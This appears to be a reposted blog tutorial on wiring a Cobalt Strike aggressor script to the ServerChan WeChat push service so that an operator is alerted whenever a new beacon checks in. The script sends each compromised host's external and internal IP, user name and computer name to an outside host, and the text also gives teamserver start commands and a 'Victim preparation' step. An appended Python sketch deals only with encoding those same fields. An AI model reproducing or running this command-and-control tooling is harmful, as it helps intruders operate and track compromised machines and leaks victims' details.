CobaltStrike, you have a host online

Reference:
Using ServerChan to send a WeChat reminder when a Cobalt Strike host comes online

ServerChan

Website address: http://sc.ftqq.com/3.version

Log in

You need to log in to this website (you can also log in with your GitHub account in one click), then bind "WeChat Push". Next, click "Send Message" to run a test and confirm that the message is received normally. The "call code" next to it will be needed shortly, so copy it; after that you can leave the page.

Prepare the script

Prepare a script called http_ftqq.cna; if you want to ask why it has that name, just ask ServerChan.
Fill in the SCKEY on line 25; this is the "call code" you just copied.

# Handle every new beacon as it first checks in
on beacon_initial {

    sub http_get {
        local('$output');
        $url = [new java.net.URL: $1];
        $stream = [$url openStream];
        $handle = [SleepUtils getIOHandle: $stream, $null];

        @content = readAll($handle);

        foreach $line (@content) {
            $output .= $line . "\r\n";
        }

        println($output);
    }
    # Get the IPs, computer name and logged-in account (spaces become underscores)
    $externalIP = replace(beacon_info($1, "external"), " ", "_");
    $internalIP = replace(beacon_info($1, "internal"), " ", "_");
    $userName = replace(beacon_info($1, "user"), " ", "_");
    $computerName = replace(beacon_info($1, "computer"), " ", "_");

    # GET the ServerChan URL (replace the placeholder after sc.ftqq.com/ with your SCKEY)
    $url = 'https://sc.ftqq.com/此处填写你Server酱的SCKEY码.send?text=CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92&desp=%e4%bb%96%e6%9d%a5%e4%ba%86%e3%80%81%e4%bb%96%e6%9d%a5%e4%ba%86%ef%bc%8c%e4%bb%96%e8%84%9a%e8%b8%8f%e7%a5%a5%e4%ba%91%e8%b5%b0%e6%9d%a5%e4%ba%86%e3%80%82%0D%0A%0D%0A%e5%a4%96%e7%bd%91ip:'.$externalIP.'%0D%0A%0D%0A%e5%86%85%e7%bd%91ip:'.$internalIP.'%0D%0A%0D%0A%e7%94%a8%e6%88%b7%e5%90%8d:'.$userName.'%0D%0A%0D%0A%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:'.$computerName;

    http_get($url);

}
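The script concatenates the beacon metadata into the query string after replacing only spaces, so a value containing & or # cuts the message short before it reaches ServerChan. The Python sketch below is an added example, not part of the original script: it reuses the percent-encoded labels from the $url string (the greeting sentence is left out), and the key placeholder and sample values are constructed.

```python
from urllib.parse import parse_qs, quote, urlsplit

# Constructed placeholder; the page's script expects your own SCKEY here.
SCKEY = "SCKEY_PLACEHOLDER"
BASE = "https://sc.ftqq.com/" + SCKEY + ".send"

# Percent-encoded literals copied from the page's $url string.
TEXT = "CobaltStrike%e4%b8%8a%e7%ba%bf%e6%8f%90%e9%86%92"
LABELS = {
    "external": "%e5%a4%96%e7%bd%91ip:",
    "internal": "%e5%86%85%e7%bd%91ip:",
    "user": "%e7%94%a8%e6%88%b7%e5%90%8d:",
    "computer": "%e8%ae%a1%e7%ae%97%e6%9c%ba%e5%90%8d:",
}
SEP = "%0D%0A%0D%0A"  # blank line between fields, as in the script


def build_url(fields, encode):
    """Build the GET URL; encode=False mimics the script's raw concatenation."""
    parts = []
    for key, label in LABELS.items():
        value = fields[key].replace(" ", "_")  # same substitution as the script
        parts.append(label + (quote(value, safe="") if encode else value))
    return BASE + "?text=" + TEXT + "&desp=" + SEP.join(parts)


def received_desp(url):
    """Return the 'desp' parameter as a server would parse it from the URL."""
    return parse_qs(urlsplit(url).query)["desp"][0]


# Constructed sample metadata; the user name contains '&' and '#'.
SAMPLE = {"external": "203.0.113.7", "internal": "10.0.0.5",
          "user": "svc&backup#1", "computer": "LAB-PC 01"}

if __name__ == "__main__":
    print(repr(received_desp(build_url(SAMPLE, encode=False))))  # truncated
    print(repr(received_desp(build_url(SAMPLE, encode=True))))   # complete
```

With raw concatenation the message ends at the user name and the computer name never arrives; percent-encoding each value keeps all four fields intact.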

Cobalt Strike preparation

The next step is to get a host online; how you do that is up to you.

Start the CS team server on Kali:

sudo chmod +x teamserver
sudo ./teamserver 10.3.139.50 123456

Start the CS client on Kali:

sudo chmod +x start.sh
./start.sh

Load script


New listener


Victim preparation


Online


Origin blog.csdn.net/weixin_44288604/article/details/110733870